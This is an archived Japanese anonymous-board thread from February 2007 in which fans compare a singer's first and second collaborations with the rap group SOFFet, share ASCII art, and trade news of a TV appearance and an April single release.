342 :名無しの歌姫:2007/02/14(水) 00:10:05 ID:zstysxGz
コラボの相手SOFFetだからドーリスと合うんだよ。SOFFetのラップは優しいし、Jazzなスウィングラップってのもやってるし。
ありえないがリップスライムとかとやっても絶対合わない。
自分も好きだな、こっちの方が。

343 :名無しの歌姫:2007/02/14(水) 01:29:51 ID:A7A5T8XA
第二弾本日ですね。

+   +
  ∧_∧  +
 (0゚・∀・)   ワクワクテカテカ
 (0゚∪ ∪ +
 と__)__) +

344 :名無しの歌姫:2007/02/14(水) 02:25:27 ID:QjzcSXi4
自分も二弾目派。
すぐに頭に残る曲だったし、何度聴いていても飽きなかった。

345 :名無しの歌姫:2007/02/14(水) 03:38:30 ID:A7A5T8XA
そういえば書いてませんでした。
自分は第一弾派です。
二弾目優勢ですがw

346 :名無しの歌姫:2007/02/14(水) 05:10:35 ID:EK95o6Cu
>>342
リップもドリタソも好きだが、絶対合わないからやめてほしい組み合わせだなw

347 :名無しの歌姫:2007/02/15(木) 04:31:16 ID:d87sxK5x
オレも2弾目かな、ドリの中では新しいけど
らしさもよく出てる

348 :名無しの歌姫:2007/02/18(日) 23:35:46 ID:GMY3l2MV
アゲ

349 :名無しの歌姫:2007/02/19(月) 12:30:04 ID:xIRTnbp1
今日だよね??MusicEdge
NextStyleの方かな(´・ω・`)

350 :名無しの歌姫:2007/02/19(月) 23:52:26 ID:n2LNrRPi
4chで0:55〜の放送ですか?

351 :名無しの歌姫:2007/02/20(火) 01:40:00 ID:Wogn+bxo
NextStyleで出たね
てかシングルで出るんじゃん(`・ω・´)

352 :名無しの歌姫:2007/02/21(水) 01:57:49 ID:GPNci6N7
どーも^^

353 :名無しの歌姫:2007/02/22(木) 02:29:44 ID:1Xihclll
>>352
ドリタンでつか?(^O^)

354 :名無しの歌姫:2007/02/23(金) 01:09:57 ID:DqMhEX9Z
>>351
それはコラボ2弾がってこと?

355 :351:2007/02/23(金) 02:40:45 ID:IgHXiaqS
>>354
そうだよ
4月18日だって

356 :名無しの歌姫:2007/02/23(金) 13:02:39 ID:DqMhEX9Z
>>355
そうなんだ?
でもアルバムでるじゃんね

61 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)